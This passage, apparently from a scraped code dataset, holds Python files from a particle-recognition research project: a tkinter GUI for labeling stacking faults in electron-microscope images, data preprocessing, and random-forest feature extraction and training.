\"\"\"function that takes in the training feature set and training labels and trains a random forest with\n    n estimators given by nestimators\"\"\"\n    classifier = RandomForestClassifier(n_estimators= nestimators,criterion= crit,max_features=max_feat)\n    classifier.fit(X_train, Y_train)\n    return classifier\n\ndef cross_val_stratified(features_df,model,nsplit):\n    \"\"\"runs stratified k-fold cross validation 
where nsplit specifies the number of splits\n    and returns the mean and standard deviation of the cross validation score. Based on the code shown in\n    class.\"\"\"\n    X = features_df.iloc[:,:-1]\n    Y = features_df.iloc[:,-1]\n    cv = StratifiedKFold(n_splits=nsplit)\n    scores = cross_val_score(model, X, Y, cv=cv, n_jobs=-1)\n    print(\"mean: {:.3f}, stdev: {:.3f}\".format(\n        np.mean(scores), np.std(scores)))\n\ndef plot_confusion_matrix(X, Y, df, model):\n    \"\"\"Creates a confusion matrix for the different classes given a set of features, true labels, the dataset\n    and the desired trained classifier\"\"\"\n    Y_pred = model.predict(X)\n    Y_labels = df['Label'].drop_duplicates()\n    cfm = confusion_matrix(Y, Y_pred, labels=Y_labels)\n    df_cfm = pd.DataFrame(data = cfm, columns=Y_labels, index=Y_labels)\n    plt.subplots(figsize=(5,5))\n    ax = sns.heatmap(df_cfm, vmax = 90, annot=True, fmt=\"d\",cmap='rainbow')\n\ndef feature_importance(X_train,classifier):\n    \"\"\"Makes a plot of feature importance based on the feature importances calculated by scikit learn.\n    Obviously features such as histograms actually go into the classifier as several features so the function\n    adds the importances of each of the features belonging to a certain class of feature\"\"\"\n    feat_importance = np.vstack((X_train.columns.values[1:],classifier.feature_importances_[1:]))\n    previous = feat_importance[0,0]\n    classes = [previous]\n    counts = []\n    temp_count = 0\n    for idx, classify in enumerate(feat_importance[0,:]):\n        if classify.split('.')[0] == previous:\n            temp_count += feat_importance[1,idx]\n            previous = classify.split('.')[0]\n        else:\n            counts.append(temp_count)\n            classes.append(classify)\n            temp_count = 0\n            temp_count += feat_importance[1,idx]\n            previous = classify\n\n    counts.append(temp_count)\n    fig, ax = plt.subplots()\n    plt.bar(np.arange(1,len(classes)+1),counts,tick_label = classes)\n    for tick in ax.get_xticklabels():\n        tick.set_rotation(80)\n    ax.set_xlabel('Feature Class')\n    ax.set_ylabel('Feature Importance')\n    ax.set_title(\"Feature Importance vs Feature Class\")\n\ndef optimize_model(X_train,Y_train, nestimators = [10,20,30,50,70,100]):\n    \"\"\"function which runs model optimization given a certain number of n_estimators, max_features, and criterion\n    (gini or entropy)\"\"\"\n    logging.basicConfig(level=logging.INFO,\n                        format='%(asctime)s %(levelname)s %(message)s')\n    parameters = {'n_estimators':nestimators, 'max_features':[3,8,10,'auto'],\n                  'criterion': ['gini','entropy']}\n    rf_tune = model_selection.GridSearchCV(RandomForestClassifier(), parameters,\n                                           n_jobs = -1, cv = 5,verbose=1)\n    rf_opt = rf_tune.fit(X_train, Y_train)\n    print(\"Best zero-one score: \" + str(rf_opt.best_score_) + \"\\n\")\n    print(\"Optimal Model:\\n\" + str(rf_opt.best_estimator_))\n    return rf_opt\n" }, { "alpha_fraction": 0.5118491053581238, "alphanum_fraction": 0.5535714030265808, "avg_line_length": 37.65806579589844, "blob_id": "26c8362feebc314a5664f3a45d42fa80bb1d84ae", "content_id": "0fe1bcc9515d8c12d50e89db6d25a407337b89ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5992, "license_type": "no_license", "max_line_length": 141, "num_lines": 155, "path": "/image_processing/ncempy/test/test_algo_multicorr.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "'''\nTests for the algo.multicorr module.\n'''\n\nimport unittest\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nfrom io import StringIO\nimport cv2\n\nimport 
ncempy.algo.multicorr as mc\n\nclass test_shiftedimages(unittest.TestCase):\n \"\"\"Test the multicorr module on two shifted images\"\"\"\n\n def test_parse_input(self):\n '''\n Test to make sure inputs are properly accounted for.\n '''\n\n\n g1 = 1\n g2 = np.zeros([4,4])\n with self.assertRaises(TypeError):\n mc.parse_input(g1, g2) # both must be arrays\n with self.assertRaises(TypeError):\n mc.parse_input(g2, g1)\n\n # tests input sanitation.\n saved_stdout = sys.stdout\n try:\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'dummy', 4)\n output = out.getvalue().strip()\n self.assertEqual(output, 'Unknown method used, setting to cross')\n\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'cross', 23.1)\n output = out.getvalue().strip()\n self.assertEqual(output, 'Upsample factor is not an integer, rounding down')\n\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'cross', -23.1)\n output = out.getvalue().strip()\n self.assertEqual(output, 'Upsample factor is not an integer, rounding down\\nUpsample factor is < 1, setting to 1')\n\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'cross', 'phase')\n output = out.getvalue().strip()\n self.assertEqual(output, 'Upsample factor is not an integer or float, setting to 1')\n finally:\n sys.stdout = saved_stdout\n\n with self.assertRaises(TypeError):\n mc.parse_input(np.zeros([2,3]), np.zeros([3,2]), 'phase', 1)\n\n with self.assertRaises(TypeError):\n mc.initial_correlation_image(g2, g2, 'tester', 1)\n\n def test_multicorr(self):\n '''\n Test to check if the correlation is working.\n '''\n g2 = np.zeros((3,3))\n test = mc.multicorr(np.fft.fft2(g2), np.fft.fft2(g2), 'phase', 3)\n print(test)\n assert list(test) == [0, 0]\n\n # filename = '/Users/Tom/Downloads/matt_beard.jpg'\n # filename_shifted = '/Users/Tom/Downloads/matt_beard_shifted.jpg'\n # G1 = cv2.imread(filename, 0)\n # G1 = G1[0:100, 0:100]\n G1 = np.zeros((100,100))\n G1[42,35] = 12\n # G2 = cv2.imread(filename_shifted, 0)\n G2 = np.real(np.fft.ifft2(mc.imageShifter(np.fft.fft2(G1), [-30, 10])))\n print(G1.shape, G2.shape)\n # plt.figure(0)\n # plt.imshow(np.concatenate((G1, G2)))\n # plt.show(block = True)\n imageCorr = mc.initial_correlation_image(np.fft.fft2(G1), np.fft.fft2(G2), 'phase', 2)\n\n # test to see if correlation image looks the same\n np.testing.assert_almost_equal(np.exp(1j * np.angle((np.multiply(np.fft.fft2(G2), np.conj(np.fft.fft2(G1)))))), imageCorr, decimal=4)\n\n # plt.figure(1)\n # plt.imshow(np.real(np.fft.ifft2(imageCorr)))\n # plt.show(block = True )\n out_phase = mc.multicorr(np.fft.fft2(G1), (np.fft.fft2(G2)), 'phase', 2)\n self.assertEqual(out_phase, [-30.0, 10.0])\n\n # test cross correlation\n out_cross = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'cross', 1)\n self.assertEqual(out_cross, [-30.0, 10.0])\n\n # test hybrid correlation and dft upsample\n out_hybrid = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'hybrid', 3)\n out_hybrid = list(out_hybrid)\n np.testing.assert_almost_equal(out_hybrid, [-30.0, 10.0], decimal = 6)\n\n # plt.imshow(np.subtract(G1, np.real(np.fft.ifft2(out.G2shift))))\n # plt.show(block = True)\n\n\n def test_different_shifts(self):\n '''\n Tests to check if mod is working correctly\n '''\n # filename = '/Users/Tom/Downloads/matt_beard.jpg'\n # G1 = cv2.imread(filename, 0)\n # G1 = G1[0:501, 0:501]\n G1 = np.zeros((101,101))\n G1[55,55] = 12\n # plt.imshow(G1)\n # plt.show(block = True)\n shifts = [[3., 1.], [-3., -1.], [-3., 1.], [3.,-1.]]\n shifts2 = [[10.3, 14.1], 
[-10.3, -14.1], [-10.3, 14.1], [10.3,-14.1]]\n        for i in shifts:\n            # print(i)\n            G2 = np.real(np.fft.ifft2(mc.imageShifter(np.fft.fft2(G1), i)))\n            # plt.imshow(np.concatenate((G1, G2)))\n            # plt.show(block = True)\n            with self.subTest(i = i):\n                out_phase = mc.multicorr(np.fft.fft2(G1), (np.fft.fft2(G2)), 'phase', 3)\n                np.testing.assert_almost_equal(out_phase, i, decimal = 6)\n                out_cross = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'cross', 3)\n                np.testing.assert_almost_equal(out_cross, i, decimal = 6)\n                out_hybrid = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'hybrid', 3)\n                out_hybrid = list(out_hybrid)\n                np.testing.assert_almost_equal(out_hybrid, i, decimal = 6)\n        for i in shifts2:\n            # print(i)\n            G2 = np.real(np.fft.ifft2(mc.imageShifter(np.fft.fft2(G1), i)))\n            with self.subTest(i = i):\n\n                out_phase = mc.multicorr(np.fft.fft2(G1), (np.fft.fft2(G2)), 'phase', 10)\n                out_phase = list(out_phase)\n                np.testing.assert_almost_equal(out_phase, i, decimal = 2)\n\n                out_hybrid = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'hybrid', 10)\n                out_hybrid = list(out_hybrid)\n                np.testing.assert_almost_equal(out_hybrid, i, decimal = 2)\n\n                out_cross = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'cross', 10)\n                out_cross = list(out_cross)\n                np.testing.assert_almost_equal(out_cross, i, decimal = 2)\n\nif __name__ == \"__main__\":\n    unittest.main()\n" }, { "alpha_fraction": 0.563124418258667, "alphanum_fraction": 0.5712988376617432, "avg_line_length": 26.524999618530273, "blob_id": "15144ca1154e42d0224000582fc6c2184715f5fe", "content_id": "527e6ebf594510dc943e555cd31b5f99dace5c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1101, "license_type": "no_license", "max_line_length": 47, "num_lines": 40, "path": "/image_processing/label_stats.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom ast import literal_eval\nimport shutil\n\ndef txt_reader(file):\n    txt_info = open(file,'r')\n    txt = []\n    centers = []\n    radii = []\n    labels = []\n    for line in txt_info:\n        if line == '\\n':\n            pass\n        else:\n            line = line.strip('\\n')\n            txt.append(line)\n    if 'Not Weird Data' == txt[0]:\n        weird = 'Not Weird Data'\n        start = 2\n    elif 'Weird Data' == txt[0]:\n        weird = 'Weird Data'\n        start = 2\n    else:\n        weird = 'No W Labeled'\n        start = 1\n    start = txt.index('Particle Location:') + 1\n    center_stop = txt.index('Radius Size:')\n    radius_stop = txt.index('Defect Label:')\n    label_stop = txt.index('Image Size:')\n    for loc in txt[start:center_stop]:\n        centers.append(literal_eval(loc))\n    for loc in txt[center_stop+1:radius_stop] :\n        radii.append(int(loc))\n    for loc in txt[radius_stop+1:label_stop] :\n        labels.append(loc)\n    image_size = literal_eval(txt[-1])\n    return centers, radii, labels, weird\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 34, "blob_id": "9f1eeb60898139332507bb40e59762eaf1d915cd", "content_id": "9d53fa1379073f1e9880df1920211a00a5035056", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/label_data_gui/README.md", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# README For Particle Labeling GUI\n" } ]
24
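To make the feature-engineering pipeline in the `particleRecognition` files above easier to follow in isolation, here is a minimal, self-contained sketch of the same idea: concatenate a few simple image descriptors into one flat vector per image and cross-validate a random forest on them. The synthetic random images and alternating dummy labels are stand-ins for the labeled particle cut-outs, and `describe` condenses the per-feature helpers (`sobel_edges`, `fft_hist`, `gray_range`) into one function; it is a sketch, not the repo's exact code.

```python
import numpy as np
from skimage import filters
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold, cross_val_score

def describe(image):
    """Build one flat feature vector from a grayscale image."""
    # 50-bin histogram of Sobel edge strengths (cf. sobel_edges above)
    edge_hist = np.histogram(filters.sobel(image).ravel(), bins=50, density=True)[0]
    # 20-bin histogram of log-magnitude frequencies (cf. fft_hist above);
    # the small epsilon guards against log2(0)
    fft_hist = np.histogram(np.log2(np.abs(np.fft.rfft2(image)) + 1e-9),
                            bins=20, density=True)[0]
    # global intensity statistics (cf. gray_range above)
    stats = np.array([image.mean(), image.std()])
    return np.concatenate([edge_hist, fft_hist, stats])

rng = np.random.default_rng(0)
images = rng.random((40, 64, 64))   # stand-in for the labeled image cut-outs
labels = np.tile([0, 1], 20)        # stand-in for the class labels
X = np.stack([describe(im) for im in images])

clf = RandomForestClassifier(n_estimators=50, random_state=0)
scores = cross_val_score(clf, X, labels, cv=StratifiedKFold(n_splits=4))
print("CV accuracy: %.3f +/- %.3f" % (scores.mean(), scores.std()))
```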
Ragnok/residential
https://github.com/Ragnok/residential
1023b29436cbd0f704af58eda160c60ad5474716
313282a837512cbec3a18e35ad9915d7f0ee5a26
fa0990efd9ed91e07c0cd66b281c0c77c7039d1a
refs/heads/master
2016-09-23T01:59:28.219222
2016-07-29T15:41:10
2016-07-29T15:41:10
63,088,258
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5808066725730896, "alphanum_fraction": 0.5926432013511658, "avg_line_length": 33.86666488647461, "blob_id": "8eebb48f30b5c6b739689b5360668e41dc564925", "content_id": "a18c82576aedec2ae21e45a0d7acd44023a3c560", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10983, "license_type": "no_license", "max_line_length": 169, "num_lines": 315, "path": "/ol_res.py", "repo_name": "Ragnok/residential", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\nimport struct\nimport selectors\nimport socket\nimport sys\nfrom header import Header\nfrom liquid import Liquid\n\nWTR_DROP_SZ = 8\nPKT_HDR_SZ = 8\nPKT_TYPE_WATER = 0\nPKT_TYPE_TRASH = 1\nPKT_TYPE_SLUDGE = 2\nPKT_TYPE_HZMT = 4\nPKT_TYPE_RPRT = 8\nCOMPACTED_DROP = 0xFFFF\n#Error Type\n#reporting format\n#process header\n#process water\n#send report\n#class process\n\n#Trash? have to parse entire packet if trash is found send to 2222\n#No Trash\n#Heavy Metal? - Mercury Selenium convert circularly linked list to single linked list extract largest value node and make null anything that points to extracted node 8888\n#rest of payload\n#biological wastes - undulating data and prime number data removed offending molecules script sludge 4444 all nodes pointing to removed nodes zeroed out\n#rest of payload\n#Chemical Treatments - nothing removed\n#water payload sent to 1111\n\n#shore up output connect so we don't lose data\n#need to remove droplet should remove the droplet from the packet of droplets\n#add a new fn that airify droplets (what droplet currently is doing)\n#trash\n\nclass Output:\n    def __init__(self):\n        self._queue = []\n\n    def add(self, server, port, data):\n        self._queue.append((server, port, data))\n\n    def get(self):\n        return self._queue.pop(0)\n\n    def num_items(self):\n        return len(self._queue)\n\n\nclass Client:\n    def __init__(self, socket, address):\n        self._socket = socket\n        self._address = address\n        self.clear_data()\n\n    is_output = False\n    finished = False # helper attribute so parsers can set a 'disconnect' flag\n\n    def clear_data(self):\n        self._data = bytes('',\"utf-8\")\n\n    def socket(self):\n        return self._socket\n\n    def ip(self):\n        return self._address[0]\n\n    def port(self):\n        return self._address[1]\n\n    def data(self):\n        return self._data\n\n    def add_data(self, data):# when read from the socket, add the data to here\n        self._data += data\n\n    def remove_packet(self, size):# removes size bytes from start of data stream\n        self._data = self._data[size:]\n\nclass Water:\n    def __init__(self):\n        self._droplets = [None]#start tuple\n\n    def remove_droplet(self, idx):\n        if self._droplets==None:\n            return\n        self._droplets[idx] = (0,0,0)\n\n    def generate_packet(self, pkt_type=PKT_TYPE_WATER, custom=0):#can add argument or use custom 0\n        size = PKT_HDR_SZ + (self.num_droplets() * WTR_DROP_SZ )\n        packet = struct.pack(\"!HHI\", pkt_type, size, custom)\n        for drop in range(1, self.num_droplets()+1):\n            (data, left, right) = self.get_droplet(drop)\n            packet += struct.pack(\"!IHH\", data, left, right)\n        return packet\n\n    def add_droplet(self, data, left, right):\n        self._droplets.append((data, left, right))\n\n    def _set_droplet(self, idx, data, left, right):\n        self._droplets[idx] = (data, left, right)\n\n    def num_droplets(self):#have to subtract 1 as dummy in place\n        return len(self._droplets)-1\n\n    def get_droplet(self, idx):#can use idx\n        if idx > self.num_droplets():\n            return None\n        return self._droplets[idx]\n\n    def has_trash(self):\n        max_idx = self.num_droplets()\n        
for idx in range(1, max_idx+1):\n            droplet = self.get_droplet(idx)\n            if droplet[1] > max_idx or droplet[2] > max_idx:\n                return True\n        return False#no trash\n\n    def compact_trash(self):\n        max_idx = self.num_droplets()\n        for idx in range(1, max_idx+1):\n            droplet = self.get_droplet(idx)\n            if droplet[1] > max_idx or droplet[2] > max_idx:\n                self._set_droplet(idx, droplet[0], COMPACTED_DROP, COMPACTED_DROP)\n\n    def get_feces_index(self):\n        #if data is a prime number remove and send to sludge\n        max_idx = self.num_droplets()\n        for idx in range(1, max_idx+1):\n            droplet = self.get_droplet(idx)\n            if is_prime(droplet[0]):\n                return idx\n        return None\n\n    def clean_feces(self):\n        # if data is a prime number remove and send to sludge\n        max_idx = self.num_droplets()\n        for idx in range(1, max_idx+1):\n            droplet = self.get_droplet(idx)\n            if is_prime(droplet[0]):\n                #TODO send to sludgify this droplet[0]\n                print(\"Sending this turd to sludgify #\", droplet[0])\n                self.remove_droplet(idx)\n\n\n\n\"\"\"\n    def analyze() // called when finished adding drops (or any of the is_* below)\n    def remove_ammonia // returns ammonia and removes from water\n    def remove_debris() // returns all trash and removes from water\n    def remove_feces() // returns all feces and removes from water\n    def remove_mercury // returns all mercury and removes from water\n    def remove_selenium // returns all selenium and removes from water\n\n    def make_chlorine() // maybe want to set an amount of droplets to convert.. start with all\n    def treat_chlorine() // convert chlorine to clean water\n    def treat_phosphates() // convert phosphates to clean water\n\"\"\"\n\ndef is_prime(num):\n    if num==2 or num==3:\n        return True\n    if num%2==0 or num<2:\n        return False\n    for i in range(3,int(num**0.5)+1,2):\n        if num%i==0:\n            return False\n    return True\n\ndef process_client(client):\n    data = client.data()\n    if len(data) < PKT_HDR_SZ:\n        #Not enough Data to Process Header\n        return False\n    pkttype, size, custom = struct.unpack('!HHI', data[0:PKT_HDR_SZ])\n    if len(data) < size:\n        #Not enough Data waiting\n        return False\n    if size <= PKT_HDR_SZ: # must have payload\n        send_report(\"Not enough Data\")\n        return False\n    #we have a full packet\n    #TODO dictionary passing client hdr_size, size\n    #process_water(client, 8)\n    #data = client.get_data[8:]\n    if pkttype == PKT_TYPE_WATER:\n        print(\"Found Water Packet\")\n        return process_water(client, PKT_HDR_SZ, size)\n#        return process_water(data[PKT_HDR_SZ:size], custom)#don't pass header\n    elif pkttype == PKT_TYPE_TRASH:\n        print(\"Found Trash Packet.. 
forwarding to downstream\")\n        output.add(\"10.0.45.151\", 2222, data[:size])\n        #TODO Report?\n        return True\n    elif pkttype == PKT_TYPE_SLUDGE:\n        print(\"Found Sludge Packet\")\n        return True\n    elif pkttype == PKT_TYPE_HZMT:\n        print(\"Found Hazmat Packet\")\n        return True\n    elif pkttype == PKT_TYPE_RPRT:\n        print(\"Found Reporting Packet\")\n        return True\n    else:\n        print(\"Unknown packet found\")\n\ndef process_water(client, hdr_size, size):\n    payload = client.data()[hdr_size:]\n    if len(payload) % 8 != 0:\n        send_report(\"Error: Bad water payload size\")\n        return False\n    #create water instance\n    water = Water()\n    print(\"Processing %d droplets\" %(len(payload)/8))\n    while payload:\n        data, left_i, right_i = struct.unpack('!IHH', payload[0:8])\n        print (\"  Received Water droplet:%x left:%d right:%d\"% (data, left_i, right_i))\n        water.add_droplet(data, left_i, right_i)#add droplets to our water instance\n        payload = payload[8:]#loop thru droplets in the packet\n    print(\"Number of Droplets: \", water.num_droplets())\n    if water.has_trash():\n        print(\"Trash Found.. sending all droplets to downstream\")\n        water.compact_trash()\n        output.add(\"10.0.45.151\", 2222, water.generate_packet(PKT_TYPE_TRASH))\n        client.remove_packet(size)\n        return True\n\n    print(\"Sending droplets pretreat\")\n    output.add(\"10.0.45.235\", 1111, water.generate_packet())\n    client.remove_packet(size)\n    return True\n\ndef send_report(msg):\n    print(\"Sending report:\", msg)\n\noutput = Output()\n\ndef main():\n    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    print(\"server socket\", server.fileno())\n\n    # server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    # Bind the socket to the port\n    server_address = ('localhost', 1111)\n    #print >>sys.stderr, 'starting up on %s port %s' % server_address\n    server.bind(server_address)\n    server.setblocking(False)\n\n    # Listen for incoming connections\n    server.listen(100)\n\n    sel = selectors.DefaultSelector()\n    sel.register(server.fileno(), selectors.EVENT_READ)\n    finished = False\n    while finished != True:\n        try:\n            while output.num_items():#\n                (address, port, packet)=output.get()\n                print (\"Sending Data to: %s:%d '%s'\"% (address, port, packet))\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                print (\"output socket\", sock.fileno())\n                sock.setblocking(False)\n                new_client = Client(sock, (address, port))\n                new_client.is_output = True\n                new_client.add_data(packet)\n                sel.register(sock.fileno(), selectors.EVENT_WRITE, new_client)\n            events = sel.select()\n            for key, mask in events:\n                if (key.fileobj == server.fileno()):\n                    (clientsocket, address) = server.accept()\n                    print(\"client socket\", clientsocket.fileno())\n                    clientsocket.setblocking(False)\n                    print(\"New Connection on Server from \", address)\n                    print(\"Clientsocket from \", clientsocket)\n                    new_client = Client(clientsocket, address)\n                    sel.register(clientsocket.fileno(), selectors.EVENT_READ, new_client)\n                    continue\n                client = key.data\n                sock = client.socket()\n                if client.is_output:\n                    print(\"Ready to Connect: %s %d\" %(client.ip(), client.port()))\n                    res = sock.connect_ex((client.ip(), client.port()))\n                    if res == 0:\n                        print(\"Connect OK\")\n                        sock.send(client.data())\n                    elif res == 115:#EINPROGRESS\n                        continue\n                    else:\n                        print(\"Error connecting\", res)\n                    print(\"Closing Output Socket\")\n                    sel.unregister(key.fileobj)#sel select queue\n                    sock.close()\n                    continue\n                data = sock.recv(0x10000)\n                if not data:\n                    print (\"Disconnecting client\", sock)\n                    sel.unregister(key.fileobj)\n                    # sock.shutdown(1)\n                    sock.close()\n                    continue\n                #filter 
poo\n                #send water to treatment\n                print(\"activity on %d\"% sock.fileno())\n                print(\"read data \", data)\n                client.add_data(data)\n                process_client(client)\n        except KeyboardInterrupt:\n            print(\"\\nCTRL-C Detected: Quitting\")\n            finished = True\n\nif __name__ == \"__main__\":\n    main()\n" }, { "alpha_fraction": 0.6357616186141968, "alphanum_fraction": 0.6423841118812561, "avg_line_length": 18.875, "blob_id": "ed2c6fe32123f8a740d5f7fa1be79f44db32cf5f", "content_id": "66197f97be3c4772a5ebe4bae0cb2b3b3dcf450d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 151, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/restart.sh", "repo_name": "Ragnok/residential", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nps auxw | grep /root/residential/residential.py | grep -v grep > /dev/null\n\nif [ $? != 0 ]\nthen \n\t/root/residential/start.sh > /dev/null\nfi\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 59, "blob_id": "01f56614a72a21b3806bce21a39484e28dbcfbc7", "content_id": "985114044deb79aa6702350a2fdf593632187efa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "no_license", "max_line_length": 59, "num_lines": 1, "path": "/start.sh", "repo_name": "Ragnok/residential", "src_encoding": "UTF-8", "text": "nohup /root/residential/residential.py >> output.log 2>&1 &\n" } ]
3
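The `ol_res.py` server above frames everything with two fixed-size `struct` formats: an 8-byte `!HHI` header (packet type, total size, custom field) followed by zero or more 8-byte `!IHH` droplets (a data word plus left/right link indices). A minimal round-trip sketch of that wire format, independent of the socket machinery, would look like this (the sample droplet values are made up for illustration):

```python
import struct

PKT_HDR_SZ = 8
WTR_DROP_SZ = 8
PKT_TYPE_WATER = 0

def build_packet(droplets, pkt_type=PKT_TYPE_WATER, custom=0):
    # header: type (H), total packet size in bytes (H), custom field (I)
    size = PKT_HDR_SZ + WTR_DROP_SZ * len(droplets)
    packet = struct.pack("!HHI", pkt_type, size, custom)
    for data, left, right in droplets:
        # droplet: 32-bit data word plus two 16-bit link indices
        packet += struct.pack("!IHH", data, left, right)
    return packet

def parse_packet(packet):
    pkt_type, size, custom = struct.unpack("!HHI", packet[:PKT_HDR_SZ])
    payload = packet[PKT_HDR_SZ:size]
    droplets = [struct.unpack("!IHH", payload[i:i + WTR_DROP_SZ])
                for i in range(0, len(payload), WTR_DROP_SZ)]
    return pkt_type, custom, droplets

pkt = build_packet([(0xCAFE, 1, 2), (0xBEEF, 0, 0)])
print(parse_packet(pkt))  # (0, 0, [(51966, 1, 2), (48879, 0, 0)])
```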
pixzel/is105
https://github.com/pixzel/is105
c4d6601b403f7e315107bc02ec01452762fb4404
8a7bf39f7c1901b8cce622237121a0eeec0f4995
c77430b3cb6bd826ae1656f742889036fd045175
refs/heads/master
2020-06-09T03:15:49.327255
2014-02-06T14:26:10
2014-02-06T14:26:10
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5933884382247925, "alphanum_fraction": 0.6644628047943115, "avg_line_length": 20.64285659790039, "blob_id": "f0e009bb6a0d7226fe2b92a3e7ff7408a88a3574", "content_id": "707bf32efe0ceb6201d8e84acb689231fa8c757e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "no_license", "max_line_length": 44, "num_lines": 28, "path": "/lab/python/exercises/ex3.py", "repo_name": "pixzel/is105", "src_encoding": "UTF-8", "text": "#printer ut tekst med: print\nprint \"I will now count my chickens:\"\n\n#her bruker vi plus og slash\nprint \"hens\", 25+30/6\n#Bruker minus, asterisk og percent\nprint \"Roosters\", 100-25*3%4\n\nprint \"Now I will count the eggs:\"\n\nprint 3+2+1-5+4%2-1/4+6\n\nprint \"Is it true that 3 + 2 < 5 - 7?\"\n\n#bruker plus, less-than og minus\nprint 3+2<5-7\n\nprint \"what is 3 + 2?\", 3+2\nprint \"what is 5-7?\", 5-7\n\nprint \"Oh, that's why it's false.\"\n\nprint \"How about some more.\"\n\n#Bruker less-than-equal, greater-than-equal.\nprint \"Is it greater?\", 5>-2\nprint \"Is it greater or equal?\", 5>= -2\nprint \"Is it less or equal?\", 5 <= -2" }, { "alpha_fraction": 0.6588419675827026, "alphanum_fraction": 0.6651017069816589, "avg_line_length": 21.85714340209961, "blob_id": "bcca6420fa8b6eace05224250d3fa8ff88845d14", "content_id": "c35c90d43ecb9c3839d500097b1a5aa229822e74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 640, "license_type": "no_license", "max_line_length": 60, "num_lines": 28, "path": "/lab/python/exercises/ex6.py", "repo_name": "pixzel/is105", "src_encoding": "WINDOWS-1252", "text": "#Dette er en x verdi der %=10 personer.(%d for decimal)\nx= \"there are %d types of people.\" %10\n#Verdier\nbinary = \"binary\"\ndo_not = \"don't\"\n#bruker en verdi y der %=s er binary go (%s for string)\ny = \"Those who know %s and those who %s.\" % (binary, do_not)\n\n#skriver ut verdi x og y\nprint x\nprint y\n\n#skriver ut %r og %x\nprint \"I said %r.\" % x\nprint \"I also said: '%s'.\" %y\n\n\n#Her setter man %r verdien til å hete \"Hilarious\"\nhilarious = False\njoke_evaluation = \"Isn't that joke so funny?! %r\"\n\nprint joke_evaluation % hilarious\n\n#Ganske forklarende i teksten\nw = \"This is the left side of...\"\ne = \"a string with a right side.\"\n\nprint w + e" } ]
2
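The exercise files above revolve around Python 2's `%` string interpolation. The distinction between the three specifiers their comments describe can be condensed to a few lines (written with `print(...)`, which parses the same way under Python 2 and 3 for a single argument):

```python
count = 10
print("there are %d types of people." % count)   # %d formats an integer
print("those who know %s." % "binary")           # %s uses str(): binary
print("I said %r." % "binary")                   # %r uses repr(): 'binary'
```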
bdixon300/deepfake-detector-mvp-deployment
https://github.com/bdixon300/deepfake-detector-mvp-deployment
0200f9a1cfd0b24213ce741adcae9de566e001a6
4e922d085f41de9bc963df7b24845f5d5b42c3a4
c010bb695f9ff0ef240df1fc4672906d20ea7278
refs/heads/master
2022-10-23T02:53:59.578137
2020-06-19T11:20:35
2020-06-19T11:20:35
261,473,403
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6290801167488098, "alphanum_fraction": 0.6290801167488098, "avg_line_length": 21.46666717529297, "blob_id": "a46be93e1a3797bb16446947627bab665891a4b9", "content_id": "4b4292bd5e896c497f7fe5c7a3a14721e670652d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 337, "license_type": "no_license", "max_line_length": 106, "num_lines": 15, "path": "/mvp-frontend/src/ResultsComponent.js", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport './App.css';\n\nclass ResultsComponent extends React.Component {\n render() {\n return (\n <div className=\"App\">\n <br></br>\n <br></br>\n {this.props.displayAnalysisResults ? ((<p>This video is: {this.props.analysisResult}</p>) ) : (null)}\n </div>\n );}\n}\n\nexport default ResultsComponent;\n" }, { "alpha_fraction": 0.5862595438957214, "alphanum_fraction": 0.5969465374946594, "avg_line_length": 28.772727966308594, "blob_id": "d2f914ccb8866887ebcd3754eafd271d6b1ac065", "content_id": "f48c86a21ec75936e743868196ba2dc0a813d53f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 655, "license_type": "no_license", "max_line_length": 147, "num_lines": 22, "path": "/mvp-frontend/src/AnalysisComponent.js", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport './App.css';\nimport ProgressBar from 'react-bootstrap/ProgressBar';\n\nclass AnalysisComponent extends React.Component {\n render() {\n return (\n <div 